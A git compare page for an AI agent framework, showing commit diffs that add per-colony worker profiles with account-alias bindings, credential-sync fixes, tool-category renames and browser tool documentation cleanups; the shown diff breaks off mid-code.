Compare commits

...

12 Commits

Author SHA1 Message Date
Timothy 74a283aab6 fix: runtime oauth issues 2026-05-04 20:44:07 -07:00
Timothy 569c715031 feat: allow credential assignment as worker profile 2026-05-04 12:01:43 -07:00
Richard Tang feabf32768 fix: worker context token 2026-05-03 11:45:37 -07:00
Richard Tang eee55ea8c7 chore: fix wrong model name 2026-05-03 11:35:05 -07:00
Richard Tang 78fffa63ec chore: ci and release doc
Release / Create Release (push) Waiting to run
2026-05-01 18:06:39 -07:00
Richard Tang 9a75d45351 chore: lint 2026-05-01 17:53:44 -07:00
Timothy 3a94f52009 feat: sync tool result contentful display 2026-05-01 17:44:19 -07:00
Timothy 522e0f511e fix: y-axis 2026-05-01 15:48:36 -07:00
Timothy e6310f1243 fix: normalize chart spec in renderer 2026-05-01 15:36:09 -07:00
Richard Tang 12ffacccab feat: tools config frontend grouping and tools cleanup 2026-05-01 15:28:40 -07:00
Timothy 8c36b1575c Merge branch 'feature/merge-to-file-ops' into feat/file-ops 2026-05-01 14:57:21 -07:00
Richard Tang a09eac06f1 feat: improve web search and consolidate browser open 2026-05-01 14:55:20 -07:00
89 changed files with 4074 additions and 1885 deletions
-1
View File
@@ -47,7 +47,6 @@
"Bash(grep -v ':0$')",
"Bash(curl -s -m 2 http://127.0.0.1:4002/sse -o /dev/null -w 'status=%{http_code} time=%{time_total}s\\\\n')",
"mcp__gcu-tools__browser_status",
"mcp__gcu-tools__browser_start",
"mcp__gcu-tools__browser_navigate",
"mcp__gcu-tools__browser_evaluate",
"mcp__gcu-tools__browser_screenshot",
@@ -214,7 +214,7 @@ Curated list of known browser automation edge cases with symptoms, causes, and f
| **Symptom** | `browser_open()` returns `"No group with id: XXXXXXX"` even though `browser_status` shows `running: true` |
| **Root Cause** | In-memory `_contexts` dict has a stale `groupId` from a Chrome tab group that was closed outside the tool (e.g. user closed the tab group) |
| **Detection** | `browser_status` returns `running: true` but `browser_open` fails with "No group with id" |
| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_start()` again |
| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_open(url)` to lazy-create a fresh one |
| **Code** | `tools/lifecycle.py:144-160` - `already_running` check uses cached dict without validating against Chrome |
| **Verified** | 2026-04-03 ✓ |
+2 -2
View File
@@ -407,7 +407,7 @@ Aden Hive supports **100+ LLM providers** via LiteLLM, giving users maximum flex
| **Anthropic** | Claude 3.5 Sonnet, Haiku, Opus | Default provider, best for reasoning |
| **OpenAI** | GPT-4, GPT-4 Turbo, GPT-4o | Function calling, vision |
| **OpenRouter** | Any OpenRouter catalog model | Uses `OPENROUTER_API_KEY` and `https://openrouter.ai/api/v1` |
| **Hive LLM** | `queen`, `kimi-2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
| **Hive LLM** | `queen`, `kimi-k2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
| **Google** | Gemini 1.5 Pro, Flash | Long context windows |
| **DeepSeek** | DeepSeek V3 | Cost-effective, strong reasoning |
| **Mistral** | Mistral Large, Medium, Small | Open weights, EU hosting |
@@ -435,7 +435,7 @@ DEFAULT_MODEL = "claude-haiku-4-5-20251001"
**Provider-Specific Notes**
- **OpenRouter**: store `provider` as `openrouter`, use the raw OpenRouter model ID in `model` (for example `x-ai/grok-4.20-beta`), and use `OPENROUTER_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-2.5`, or `GLM-5`, and use `HIVE_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-k2.5`, or `GLM-5`, and use `HIVE_API_KEY`
**For Development**
- Use cheaper/faster models (Haiku, GPT-4o-mini)
+3 -4
View File
@@ -72,17 +72,16 @@ Register an MCP server as a tool source for your agent.
"cwd": "../tools",
"description": "Aden tools..."
},
"tools_discovered": 6,
"tools_discovered": 5,
"tools": [
"web_search",
"web_scrape",
"file_read",
"file_write",
"pdf_read",
"example_tool"
"pdf_read"
],
"total_mcp_servers": 1,
"note": "MCP server 'tools' registered with 6 tools. These tools can now be used in event_loop nodes."
"note": "MCP server 'tools' registered with 5 tools. These tools can now be used in event_loop nodes."
}
```
@@ -94,7 +94,7 @@ def _list_aden_accounts() -> list[dict]:
client = AdenCredentialClient(
AdenClientConfig(
base_url=os.environ.get("ADEN_API_URL", "https://api.adenhq.com"),
base_url=os.environ.get("ADEN_API_URL", "https://app.open-hive.com"),
)
)
try:
+13 -1
View File
@@ -249,7 +249,7 @@ or find files. Mtime-sorted in files mode.
## Browser Automation (gcu-tools MCP)
- Use `browser_*` tools `browser_open(url)` is the cold-start entry point \
(lazy-creates the context; no `browser_start` first). Then `browser_navigate`, \
(lazy-creates the context; no separate "start" call). Then `browser_navigate`, \
`browser_click`, `browser_type`, `browser_snapshot`, \
<!-- vision-only -->`browser_screenshot`, <!-- /vision-only -->`browser_scroll`, \
`browser_tabs`, `browser_close`, `browser_evaluate`, etc.
@@ -326,6 +326,18 @@ the rest.
overall purpose. Validated up front a bad cron, missing task, or \
malformed webhook path fails the call before anything is written, \
so you can retry with corrected input.
- ``worker_profiles`` (optional array) pass this ONLY when the \
colony needs multiple authorized accounts of the same vendor (two \
Slack workspaces, two Gmail accounts) so each worker calls the \
right one. Each entry: ``{name, integrations: {provider: alias}, \
task?, skill_name?, concurrency_hint?, prompt_override?, \
tool_filter?}``. ``alias`` is the account label the user assigned \
on hive.adenhq.com (e.g. ``work``, ``personal``); discover \
available aliases via ``get_account_info()``. If omitted, the \
colony has a single implicit ``default`` profile that uses each \
provider's primary account — that's the right call for almost \
every colony. Use ``update_worker_profile`` to swap a profile's \
alias later without rebuilding the colony.
- After this returns, the chat is over: the session locks immediately \
and the user gets a "compact and start a new session with you" \
button. So make your call to create_colony the last thing you do \
@@ -88,7 +88,6 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
"browser_basic": [
"browser_setup",
"browser_status",
"browser_start",
"browser_stop",
"browser_tabs",
"browser_open",
@@ -130,10 +129,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
# Research — paper search, Wikipedia, ad-hoc web scrape. Pair with
# browser_basic for richer site-by-site research; this category is the
# lightweight always-available fallback.
"research": [
"web_scrape",
"pdf_read"
],
"research": ["web_scrape", "pdf_read"],
# Security — defensive scanning and reconnaissance. Engineering-only
# surface; the rest of the queens shouldn't see port scanners.
"security": [
@@ -146,7 +142,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
"risk_score",
],
# Lightweight context helpers — good default for every queen.
"time_context": [
"context_awareness": [
"get_current_time",
"get_account_info",
],
@@ -182,7 +178,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Growth — data, experiments, competitor research; no security.
@@ -192,7 +188,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Product Strategy — user research + roadmaps; no security.
@@ -202,7 +198,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Finance — financial models (CSV/Excel heavy), market research.
@@ -213,7 +209,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
"charts",
],
# Head of Legal — reads contracts/PDFs, researches; no data/security.
@@ -223,7 +219,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Brand & Design — visual refs, style guides; no data/security.
"queen_brand_design": [
@@ -232,17 +228,16 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Talent — candidate pipelines, resumes; data + browser heavy.
"queen_talent": [
"file_ops",
"terminal_basic",
"spreadsheet_advanced",
"browser_basic",
"browser_interaction",
"research",
"time_context",
"context_awareness",
],
# Head of Operations — processes, automation, observability.
"queen_operations": [
@@ -251,7 +246,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
"spreadsheet_advanced",
"browser_basic",
"browser_interaction",
"time_context",
"context_awareness",
"charts",
],
}
@@ -17,7 +17,7 @@ Use browser nodes (with `tools: {policy: "all"}`) when:
## Available Browser Tools
All tools are prefixed with `browser_`:
- `browser_open`, `browser_navigate` preferred entry points; both lazy-create a browser context, so a single `browser_open(url)` covers the cold path. Use `browser_start` only to warm a profile without a URL or to recreate a context after `browser_stop`.
- `browser_open`, `browser_navigate` — both lazy-create the browser context, so a single `browser_open(url)` covers the cold path. To recover from a stale context, call `browser_stop` then `browser_open(url)` again.
- `browser_click`, `browser_click_coordinate`, `browser_type`, `browser_type_focused` — interact
- `browser_press` (with optional `modifiers=["ctrl"]` etc.) — keyboard shortcuts
- `browser_snapshot` — compact accessibility-tree read (structured)
@@ -289,6 +289,24 @@ class AdenSyncProvider(CredentialProvider):
"""
synced = 0
# Echo where we're talking and which key prefix we're using so a
# 401 can be diagnosed without enabling httpx debug logs. The key
# prefix is the safest discriminator: if the desktop minted a key
# against backend X but the runtime is hitting backend Y, the
# prefix in the log won't match the one the user finds in their
# ``hive_auth.bin`` (or in the dashboard's Keys panel).
cfg = self._client.config
api_key = cfg.api_key or ""
key_summary = (
f"{api_key[:8]}{api_key[-4:]}" if len(api_key) >= 12 else "<short>"
)
logger.info(
"AdenSync: GET %s/v1/credentials key=%s len=%d",
cfg.base_url.rstrip("/"),
key_summary,
len(api_key),
)
try:
integrations = self._client.list_integrations()
+9 -1
View File
@@ -714,7 +714,7 @@ class CredentialStore:
@classmethod
def with_aden_sync(
cls,
base_url: str = "https://api.adenhq.com",
base_url: str | None = None,
cache_ttl_seconds: int = 300,
local_path: str | None = None,
auto_sync: bool = True,
@@ -762,6 +762,14 @@ class CredentialStore:
logger.info("ADEN_API_KEY not set, using local-only credential storage")
return cls(storage=local_storage, **kwargs)
# Honor ADEN_API_URL when no explicit base_url was passed. The
# legacy default (https://api.adenhq.com) was a stale brand
# alias; the new canonical host is app.open-hive.com (matches
# cloud-deployed hive-backend) but local dev typically points
# at http://localhost:8889 via this env var.
if base_url is None:
base_url = os.environ.get("ADEN_API_URL", "https://app.open-hive.com")
# Try to setup Aden sync
try:
from .aden import (
+20
View File
@@ -825,6 +825,7 @@ class ColonyRuntime:
tools: list[Any] | None = None,
tool_executor: Callable | None = None,
stream_id: str | None = None,
profile_name: str | None = None,
) -> list[str]:
"""Spawn worker clones and start them in the background.
@@ -854,8 +855,20 @@ class ColonyRuntime:
raise RuntimeError("ColonyRuntime is not running")
from framework.agent_loop.agent_loop import AgentLoop
from framework.host.worker_profiles import get_worker_profile
from framework.storage.conversation_store import FileConversationStore
# Resolve the profile binding for this spawn. ``profile_name=None``
# means "use the default profile"; an unknown name silently falls
# back to default (the legacy single-template behavior). The
# resolved integrations map is threaded into Worker(...) so
# account_overrides() can pin its MCP tool calls.
_resolved_profile = (
get_worker_profile(self._colony_id, profile_name) if profile_name else None
)
_profile_name_resolved = _resolved_profile.name if _resolved_profile else (profile_name or "")
_profile_integrations = dict(_resolved_profile.integrations) if _resolved_profile else {}
# Resolve per-spawn vs colony-default code identity
spawn_spec = agent_spec or self._agent_spec
spawn_tools = tools if tools is not None else self._tools
@@ -1008,6 +1021,8 @@ class ColonyRuntime:
event_bus=self._scoped_event_bus,
colony_id=self._colony_id,
storage_path=worker_storage,
profile_name=_profile_name_resolved,
integrations=_profile_integrations,
)
self._workers[worker_id] = worker
@@ -1030,6 +1045,7 @@ class ColonyRuntime:
tasks: list[dict[str, Any]],
*,
tools_override: list[Any] | None = None,
profile_name: str | None = None,
) -> list[str]:
"""Spawn a batch of parallel workers, one per task spec.
@@ -1055,11 +1071,15 @@ class ColonyRuntime:
task_data = spec.get("data")
if task_data is not None and not isinstance(task_data, dict):
task_data = {"value": task_data}
# Per-task profile_name override beats the batch-level default,
# so a fan-out can mix profiles (e.g. half tasks routed to
# Slack:work and half to Slack:personal).
ids = await self.spawn(
task=task_text,
count=1,
input_data=task_data or {"task": task_text},
tools=tools_override,
profile_name=spec.get("profile_name") or profile_name,
)
worker_ids.extend(ids)
return worker_ids
+1 -1
View File
@@ -7,7 +7,7 @@ verify SOP gates before marking a task done. This gives cross-run memory
that the existing per-iteration stall detectors don't have.
The DB is driven by agents via the ``sqlite3`` CLI through
``execute_command_tool``. This module handles framework-side lifecycle:
``terminal_exec``. This module handles framework-side lifecycle:
creation, migration, queen-side bulk seeding, stale-claim reclamation.
Concurrency model:
+23 -1
View File
@@ -54,6 +54,11 @@ class WorkerInfo:
status: WorkerStatus
started_at: float = 0.0
result: WorkerResult | None = None
# Name of the colony's worker profile this worker was spawned from.
# Empty for legacy / single-template colonies. Surfaced in the UI so
# the user can see "Worker w_42 in colony X is using profile slack-work"
# and reason about which authorized account this run is touching.
profile_name: str = ""
class Worker:
@@ -79,6 +84,8 @@ class Worker:
colony_id: str = "",
persistent: bool = False,
storage_path: Path | None = None,
profile_name: str = "",
integrations: dict[str, str] | None = None,
):
self.id = worker_id
self.task = task
@@ -88,6 +95,12 @@ class Worker:
self._event_bus = event_bus
self._colony_id = colony_id
self._persistent = persistent
# Worker profile binding. ``integrations`` is a {provider_id: alias}
# map applied as default account overrides for every MCP tool call
# this worker makes (see CredentialStoreAdapter.account_overrides).
# An explicit ``account="..."`` arg on a tool call still wins.
self._profile_name = profile_name
self._integrations: dict[str, str] = dict(integrations or {})
# Canonical on-disk home for this worker (conversations, events,
# result.json, data). Required when seed_conversation() is used —
# we deliberately do NOT fall back to CWD, which previously caused
@@ -114,6 +127,7 @@ class Worker:
status=self.status,
started_at=self._started_at,
result=self._result,
profile_name=self._profile_name,
)
@property
@@ -173,8 +187,16 @@ class Worker:
exc_info=True,
)
# Pin MCP tool calls to this worker's profile-bound aliases. Empty
# mapping is a no-op so ephemeral workers and legacy single-profile
# colonies are unaffected. The contextvar is propagated to all
# awaited child coroutines, so every tool invocation downstream of
# ``execute`` sees the binding without further plumbing.
from aden_tools.credentials.store_adapter import account_overrides
try:
result = await self._agent_loop.execute(self._context)
with account_overrides(self._integrations):
result = await self._agent_loop.execute(self._context)
duration = time.monotonic() - self._started_at
if result.success:
+207
View File
@@ -0,0 +1,207 @@
"""Worker profile data model and per-colony persistence.
A colony today has a single worker template at ``{colony_dir}/worker.json``
spawned as N parallel clones with identical tools, prompt, and credentials.
Worker profiles let the queen declare multiple templates per colony, each
with its own credential aliases (e.g. one profile pinned to Slack workspace
"work" and another to "personal").
Layout::
{COLONIES_DIR}/{colony_name}/
worker.json # legacy / "default" profile
profiles/
slack-work/worker.json
slack-personal/worker.json
metadata.json # has worker_profiles: [{...}, ...]
The default profile keeps living at ``{colony_dir}/worker.json`` so existing
colonies and code that hardcodes that path stay correct. Named profiles live
under ``profiles/<name>/`` and are read through :func:`worker_spec_path`.
"""
from __future__ import annotations
import logging
import re
from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Any
from framework.config import COLONIES_DIR
from framework.host.colony_metadata import (
colony_metadata_path,
load_colony_metadata,
update_colony_metadata,
)
logger = logging.getLogger(__name__)
DEFAULT_PROFILE_NAME = "default"
_PROFILE_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9_-]{0,63}$")
@dataclass
class WorkerProfile:
"""Template for a worker spawned within a colony.
``integrations`` maps provider id (``slack``, ``google``, ``github``) to
the alias of the connected account this profile should use. The runtime
sets these aliases as defaults on MCP tool calls; an explicit
``account="..."`` argument on a call still wins.
"""
name: str
task: str = ""
skill_name: str = ""
integrations: dict[str, str] = field(default_factory=dict)
concurrency_hint: int | None = None
prompt_override: str | None = None
tool_filter: list[str] | None = None
def to_dict(self) -> dict[str, Any]:
d = asdict(self)
# Drop None / empty fields so on-disk metadata stays tidy.
if d.get("prompt_override") is None:
d.pop("prompt_override", None)
if d.get("tool_filter") is None:
d.pop("tool_filter", None)
if d.get("concurrency_hint") is None:
d.pop("concurrency_hint", None)
return d
@classmethod
def from_dict(cls, data: dict[str, Any]) -> WorkerProfile:
return cls(
name=str(data.get("name", "")).strip(),
task=str(data.get("task", "")),
skill_name=str(data.get("skill_name", "")),
integrations={
str(k): str(v)
for k, v in (data.get("integrations") or {}).items()
if str(k) and str(v)
},
concurrency_hint=(
int(data["concurrency_hint"])
if isinstance(data.get("concurrency_hint"), int) and data["concurrency_hint"] > 0
else None
),
prompt_override=(data.get("prompt_override") or None),
tool_filter=list(data["tool_filter"]) if isinstance(data.get("tool_filter"), list) else None,
)
def validate_profile_name(name: str) -> str | None:
"""Return an error message if ``name`` is invalid, else ``None``."""
if not isinstance(name, str) or not _PROFILE_NAME_RE.match(name):
return (
"profile name must be lowercase alphanumeric (with - or _), "
"start with a letter/digit, and be ≤64 characters"
)
return None
def worker_spec_path(colony_name: str, profile_name: str | None = None) -> Path:
"""Return the on-disk path to a profile's ``worker.json``.
The default / unnamed profile lives at ``{colony_dir}/worker.json``
(legacy location). Named profiles live at
``{colony_dir}/profiles/{profile_name}/worker.json``.
"""
colony_dir = COLONIES_DIR / colony_name
if not profile_name or profile_name == DEFAULT_PROFILE_NAME:
return colony_dir / "worker.json"
return colony_dir / "profiles" / profile_name / "worker.json"
def list_worker_profiles(colony_name: str) -> list[WorkerProfile]:
"""Return the colony's declared worker profiles.
Legacy colonies (no ``worker_profiles`` field in metadata.json) get a
synthetic single-entry list with the default profile, so dispatch logic
elsewhere can treat the profile registry as always non-empty.
"""
metadata = load_colony_metadata(colony_name)
raw = metadata.get("worker_profiles")
if not isinstance(raw, list) or not raw:
return [WorkerProfile(name=DEFAULT_PROFILE_NAME)]
profiles: list[WorkerProfile] = []
seen: set[str] = set()
for entry in raw:
if not isinstance(entry, dict):
continue
profile = WorkerProfile.from_dict(entry)
if not profile.name or profile.name in seen:
continue
if validate_profile_name(profile.name) is not None:
logger.warning(
"worker_profiles: skipping invalid profile name %r in colony %s",
profile.name,
colony_name,
)
continue
seen.add(profile.name)
profiles.append(profile)
if not profiles:
return [WorkerProfile(name=DEFAULT_PROFILE_NAME)]
return profiles
def get_worker_profile(colony_name: str, profile_name: str) -> WorkerProfile | None:
"""Return one profile by name, or ``None`` if not declared."""
for profile in list_worker_profiles(colony_name):
if profile.name == profile_name:
return profile
return None
def save_worker_profiles(colony_name: str, profiles: list[WorkerProfile]) -> list[WorkerProfile]:
"""Persist ``profiles`` to the colony's metadata.json.
Validates names, deduplicates, and refuses to write an empty list (use
the default profile representation instead). Returns the canonicalized
list as written.
"""
if not colony_metadata_path(colony_name).parent.exists():
raise FileNotFoundError(f"Colony '{colony_name}' not found")
canonical: list[WorkerProfile] = []
seen: set[str] = set()
for profile in profiles:
err = validate_profile_name(profile.name)
if err is not None:
raise ValueError(err)
if profile.name in seen:
raise ValueError(f"duplicate worker profile name: {profile.name!r}")
seen.add(profile.name)
canonical.append(profile)
if not canonical:
canonical = [WorkerProfile(name=DEFAULT_PROFILE_NAME)]
update_colony_metadata(colony_name, {"worker_profiles": [p.to_dict() for p in canonical]})
return canonical
def upsert_worker_profile(colony_name: str, profile: WorkerProfile) -> list[WorkerProfile]:
"""Insert or replace a single profile, preserving siblings."""
err = validate_profile_name(profile.name)
if err is not None:
raise ValueError(err)
existing = list_worker_profiles(colony_name)
out = [p for p in existing if p.name != profile.name]
out.append(profile)
return save_worker_profiles(colony_name, out)
def delete_worker_profile(colony_name: str, profile_name: str) -> bool:
"""Remove a profile by name. Returns True if a profile was removed.
Refuses to remove the default profile so dispatch always has a fallback.
"""
if profile_name == DEFAULT_PROFILE_NAME:
raise ValueError("cannot delete the default worker profile")
existing = list_worker_profiles(colony_name)
out = [p for p in existing if p.name != profile_name]
if len(out) == len(existing):
return False
save_worker_profiles(colony_name, out)
return True
+3 -3
View File
@@ -326,7 +326,7 @@
"supports_vision": false
},
{
"id": "kimi-2.5",
"id": "kimi-k2.5",
"label": "Kimi 2.5 - Via Hive",
"recommended": false,
"max_tokens": 32768,
@@ -489,8 +489,8 @@
"recommended": true
},
{
"id": "kimi-2.5",
"label": "kimi-2.5",
"id": "kimi-k2.5",
"label": "kimi-k2.5",
"recommended": false
},
{
+2 -2
View File
@@ -52,11 +52,11 @@ _DEFAULT_LOCAL_SERVERS: dict[str, dict[str, Any]] = {
"args": ["run", "python", "files_server.py", "--stdio"],
},
"terminal-tools": {
"description": "Terminal capabilities: process exec, background jobs, PTY sessions, fs search. Bash-only on POSIX.",
"description": "Terminal capabilities",
"args": ["run", "python", "terminal_tools_server.py", "--stdio"],
},
"chart-tools": {
"description": "BI/financial chart + diagram rendering: ECharts, Mermaid. Returns spec + downloadable PNG; chat embeds live.",
"description": "BI/financial chart + diagram rendering: ECharts, Mermaid",
"args": ["run", "python", "chart_tools_server.py", "--stdio"],
},
}
+1 -1
View File
@@ -158,7 +158,7 @@ cookie consent banners if they block content.
- If `browser_snapshot` fails, try `browser_get_text` with a narrow
selector as fallback.
- If `browser_open` fails or the page seems stale, `browser_stop`
`browser_start` retry.
`browser_open(url)` to lazy-create a fresh context.
## `browser_evaluate`
+4 -5
View File
@@ -683,11 +683,10 @@ class Orchestrator:
# Set per-execution data_dir and agent_id so data tools and
# spillover files share the same session-scoped directory, and
# so MCP tools whose server-side schemas mark agent_id as a
# required field (execute_command_tool's bash_*, etc.) get a valid
# value injected even on
# registry instances where agent_loader.setup() didn't populate
# the session_context. Without this, FastMCP rejects those
# calls with "agent_id is a required property".
# required field get a valid value injected even on registry
# instances where agent_loader.setup() didn't populate the
# session_context. Without this, FastMCP rejects those calls
# with "agent_id is a required property".
_ctx_token = None
if self._storage_path:
from framework.loader.tool_registry import ToolRegistry
+7 -1
View File
@@ -359,6 +359,7 @@ async def create_queen(
queen_goal,
queen_loop_config as _base_loop_config,
)
from framework.config import get_max_tokens as _get_max_tokens
from framework.agents.queen.nodes import (
_QUEEN_INCUBATING_TOOLS,
_QUEEN_INDEPENDENT_TOOLS,
@@ -982,7 +983,12 @@ async def create_queen(
llm=session.llm,
available_tools=queen_tools,
goal_context=queen_goal.to_prompt_context(),
max_tokens=lc.get("max_tokens", 8192),
# Honor configuration.json (llm.max_tokens) instead of
# hard-defaulting to 8192. The legacy fallback ignored both
# the user's saved ceiling AND the model's actual output
# capacity (e.g. glm-5.1 / kimi-k2.5 both support 32k out),
# which silently truncated long tool-emitting turns.
max_tokens=lc.get("max_tokens", _get_max_tokens()),
stream_id="queen",
execution_id=session.id,
dynamic_tools_provider=phase_state.get_current_tools,
+141
View File
@@ -501,5 +501,146 @@ async def _import_multi_root(
)
def _find_workers_bound_to_profile(request: web.Request, colony_name: str, profile_name: str) -> list[str]:
"""Return live worker IDs bound to ``(colony_name, profile_name)``.
Walks every live session's ColonyRuntime workers map. Used to refuse
profile deletes / renames while workers are still using the binding
the contextvar that pins a worker's MCP account lookups is set at
spawn time and a profile mutation underneath a running worker would
leave its tool calls pointing at a removed alias on the next turn.
"""
manager = request.app.get("manager")
if manager is None:
return []
bound: list[str] = []
try:
sessions = manager.list_sessions()
except Exception:
return []
for s in sessions:
runtime = getattr(s, "colony", None) or getattr(s, "colony_runtime", None)
if runtime is None:
continue
if getattr(runtime, "_colony_id", None) != colony_name:
continue
try:
for info in runtime.list_workers():
if info.profile_name == profile_name and info.status in {
"WorkerStatus.RUNNING",
"WorkerStatus.PENDING",
"running",
"pending",
}:
bound.append(info.id)
except Exception:
continue
return bound
async def handle_list_worker_profiles(request: web.Request) -> web.Response:
"""GET /api/colonies/{colony_name}/worker_profiles"""
colony_name = request.match_info["colony_name"]
err = _validate_colony_name(colony_name)
if err:
return web.json_response({"error": err}, status=400)
if not (COLONIES_DIR / colony_name).exists():
return web.json_response({"error": f"colony '{colony_name}' not found"}, status=404)
from framework.host.worker_profiles import list_worker_profiles
profiles = list_worker_profiles(colony_name)
return web.json_response({"worker_profiles": [p.to_dict() for p in profiles]})
async def handle_upsert_worker_profile(request: web.Request) -> web.Response:
"""POST /api/colonies/{colony_name}/worker_profiles — create or replace one profile.
Body: ``{name, integrations?, task?, skill_name?, concurrency_hint?,
prompt_override?, tool_filter?}``. Existing siblings are
preserved; an existing profile with the same ``name`` is replaced
(so the desktop can use this for both add and edit).
"""
colony_name = request.match_info["colony_name"]
err = _validate_colony_name(colony_name)
if err:
return web.json_response({"error": err}, status=400)
if not (COLONIES_DIR / colony_name).exists():
return web.json_response({"error": f"colony '{colony_name}' not found"}, status=404)
try:
body = await request.json()
except Exception:
return web.json_response({"error": "invalid JSON body"}, status=400)
if not isinstance(body, dict):
return web.json_response({"error": "body must be a JSON object"}, status=400)
from framework.host.worker_profiles import (
WorkerProfile,
upsert_worker_profile,
validate_profile_name,
)
profile = WorkerProfile.from_dict(body)
name_err = validate_profile_name(profile.name)
if name_err:
return web.json_response({"error": name_err}, status=400)
try:
saved = upsert_worker_profile(colony_name, profile)
except (FileNotFoundError, ValueError) as exc:
return web.json_response({"error": str(exc)}, status=400)
return web.json_response({"worker_profiles": [p.to_dict() for p in saved]}, status=201)
async def handle_delete_worker_profile(request: web.Request) -> web.Response:
"""DELETE /api/colonies/{colony_name}/worker_profiles/{profile_name}.
Refused with 409 + ``bound_workers`` listing if a live worker is
bound to the profile, so the user can stop those workers before
pruning the binding.
"""
colony_name = request.match_info["colony_name"]
profile_name = request.match_info["profile_name"]
err = _validate_colony_name(colony_name)
if err:
return web.json_response({"error": err}, status=400)
if not (COLONIES_DIR / colony_name).exists():
return web.json_response({"error": f"colony '{colony_name}' not found"}, status=404)
bound = _find_workers_bound_to_profile(request, colony_name, profile_name)
if bound:
return web.json_response(
{
"error": "profile is bound to live workers; stop them first",
"bound_workers": bound,
},
status=409,
)
from framework.host.worker_profiles import delete_worker_profile
try:
removed = delete_worker_profile(colony_name, profile_name)
except ValueError as exc:
return web.json_response({"error": str(exc)}, status=400)
if not removed:
return web.json_response({"error": f"profile '{profile_name}' not found"}, status=404)
return web.json_response({"deleted": True, "profile_name": profile_name})
def register_routes(app: web.Application) -> None:
app.router.add_post("/api/colonies/import", handle_import_colony)
app.router.add_get(
"/api/colonies/{colony_name}/worker_profiles",
handle_list_worker_profiles,
)
app.router.add_post(
"/api/colonies/{colony_name}/worker_profiles",
handle_upsert_worker_profile,
)
app.router.add_delete(
"/api/colonies/{colony_name}/worker_profiles/{profile_name}",
handle_delete_worker_profile,
)
@@ -62,6 +62,7 @@ def _worker_info_to_dict(info) -> dict:
"status": str(info.status),
"started_at": info.started_at,
"result": result_dict,
"profile_name": getattr(info, "profile_name", "") or "",
}
@@ -235,10 +236,6 @@ _SYSTEM_TOOLS: frozenset[str] = frozenset(
{
"get_account_info",
"get_current_time",
"bash_kill",
"bash_output",
"execute_command_tool",
"example_tool",
}
)
@@ -43,6 +43,21 @@ def _get_store(request: web.Request) -> CredentialStore:
return request.app["credential_store"]
def _reset_credential_adapter_cache() -> None:
"""Clear the memoized CredentialStoreAdapter so the next call re-syncs.
The adapter cache is keyed on ``(id(specs), ADEN_API_KEY)``; without
this reset, a key save/delete done after process startup is invisible
to in-process MCP tool calls until restart.
"""
try:
from aden_tools.credentials.store_adapter import _reset_default_adapter_cache
_reset_default_adapter_cache()
except Exception:
logger.warning("Failed to reset credential adapter cache", exc_info=True)
def _invalidate_queen_credentials_cache(request: web.Request) -> None:
"""Force every live Queen session to rebuild its ambient credentials block.
@@ -158,6 +173,12 @@ async def handle_save_credential(request: web.Request) -> web.Response:
save_aden_api_key(key)
# Make the new key visible to the in-process AdenSyncProvider on
# the very next CredentialStoreAdapter.default() call. The adapter
# cache is keyed on this env var.
os.environ["ADEN_API_KEY"] = key
_reset_credential_adapter_cache()
# Immediately sync OAuth tokens from Aden (runs in executor because
# _presync_aden_tokens makes blocking HTTP calls to the Aden server).
try:
@@ -193,6 +214,11 @@ async def handle_delete_credential(request: web.Request) -> web.Response:
deleted = delete_aden_api_key()
if not deleted:
return web.json_response({"error": "Credential 'aden_api_key' not found"}, status=404)
# Drop the env var so the next adapter rebuild lands in the
# non-Aden branch instead of trying to reuse the stale key.
os.environ.pop("ADEN_API_KEY", None)
_reset_credential_adapter_cache()
_invalidate_queen_credentials_cache(request)
return web.json_response({"deleted": True})
store = _get_store(request)
@@ -358,6 +384,9 @@ async def handle_resync_credentials(request: web.Request) -> web.Response:
# _presync_aden_tokens makes blocking HTTP calls to the Aden server.
await loop.run_in_executor(None, lambda: _presync_aden_tokens(CREDENTIAL_SPECS, force=True))
# Drop the cached adapter so newly-fetched accounts are visible
# to the next MCP tool call without waiting for a process restart.
_reset_credential_adapter_cache()
_invalidate_queen_credentials_cache(request)
accounts_by_provider = _collect_accounts_by_provider()
+65
View File
@@ -1151,6 +1151,7 @@ async def fork_session_into_colony(
task: str,
tasks: list[dict] | None = None,
concurrency_hint: int | None = None,
worker_profiles: list[dict] | None = None,
) -> dict:
"""Fork a queen session into a colony directory.
@@ -1398,6 +1399,56 @@ async def fork_session_into_colony(
worker_meta["concurrency_hint"] = concurrency_hint
worker_config_path.write_text(json.dumps(worker_meta, indent=2, ensure_ascii=False), encoding="utf-8")
# ── 2a. Materialize named worker profiles ────────────────────
# Each named profile gets its own ``profiles/<name>/worker.json``
# cloned from the base worker_meta with profile-specific overrides
# (task, system_prompt, tool_filter, concurrency_hint). The base
# ``worker.json`` above acts as the implicit "default" profile.
persisted_profiles: list[dict] = []
if worker_profiles:
from framework.host.worker_profiles import (
DEFAULT_PROFILE_NAME,
WorkerProfile,
validate_profile_name,
